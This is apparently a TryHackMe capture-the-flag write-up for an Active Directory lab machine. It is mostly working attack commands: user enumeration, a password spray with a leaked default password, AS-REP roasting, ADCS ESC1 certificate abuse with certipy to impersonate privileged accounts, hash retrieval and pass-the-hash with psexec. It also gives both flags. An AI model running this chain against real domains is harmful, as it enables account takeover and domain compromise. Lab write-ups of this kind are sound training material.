Platform: TryHackMe
IP Address: 10.201.84.72
Difficulty: Hard

Ledger was an Active Directory-based machine that simulated a hardened corporate environment with ADCS (Active Directory Certificate Services).
Key attack chain: Enumeration → Default Password Spray → ADCS ESC1 abuse → Certipy → Hash extraction → Lateral Movement → DA compromise.
rustscan --ulimit 5000 -a $target -- -sC -sV -Pn -oN nmap_full
thm.localLABYRINTHRID brute to pull valid users:
netexec smb $target -u '' -p '' --rid-brute | grep -i 'sidtypeuser' | awk '{print$6}' | cut -d '\' -f2 | tee userlist2.txt
Found 493 users.
LDAP enum leaked creds in description field:
netexec ldap $target -u '' -p '' --users
# SUSANNA_MCKNIGHT - Please change it: CHANGEME2023!
# IVY_WILLIS - Please change it: CHANGEME2023!
impacket-GetNPUsers thm.local/ -dc-ip $target -usersfile userlist2.txt -outputfile hashes.txt
Dumped multiple AS-REP hashes, but no crack with rockyou.
Used the leaked default password across all users:
netexec rdp $target -u userlist2.txt -p 'CHANGEME2023!'
Valid logins:
SUSANNA_MCKNIGHT:CHANGEME2023!IVY_WILLIS:CHANGEME2023!Got RDP shell:
xfreerdp3 /v:$target /u:SUSANNA_MCKNIGHT /p:'CHANGEME2023!' /cert:ignore
User flag:
THM{ENUMERATION_IS_THE_KEY}
certipy-ad find -u 'SUSANNA_MCKNIGHT' -p 'CHANGEME2023!' -dc-ip $target -vulnerable
ServerAuth).certipy-ad req -u 'SUSANNA_MCKNIGHT@thm.local' -p 'CHANGEME2023!' -dc-ip $target -target 'labyrinth.thm.local' -ca 'thm-LABYRINTH-CA' -template 'ServerAuth' -upn 'Administrator@thm.local'
Generated administrator.pfx.
Authenticate and dump hash:
certipy-ad auth -pfx 'administrator.pfx' -dc-ip $target
# NTLM: aad3b435b51404eeaad3b435b51404ee:07d677a6cf40925beb80ad6428752322
Account restrictions blocked login, so pivot was needed.
Dumped and ingested BloodHound data:
netexec ldap $target -u SUSANNA_MCKNIGHT -p 'CHANGEME2023!' --bloodhound --collection All --dns-server $target
BloodHound identified BRADLEY_ORTIZ as viable escalation path.
certipy-ad req -u 'SUSANNA_MCKNIGHT@thm.local' -p 'CHANGEME2023!' -dc-ip $target -target 'labyrinth.thm.local' -ca 'thm-LABYRINTH-CA' -template 'ServerAuth' -upn 'BRADLEY_ORTIZ@thm.local'
Auth and hash retrieval:
certipy-ad auth -pfx 'bradley_ortiz.pfx' -dc-ip $target
# NTLM: aad3b435b51404eeaad3b435b51404ee:16ec31963c93240962b7e60fd97b495d
impacket-psexec bradley_ortiz@$target -hashes :16ec31963c93240962b7e60fd97b495d
Rooted the box!
Root flag:
THM{THE_BYPASS_IS_CERTIFIED!}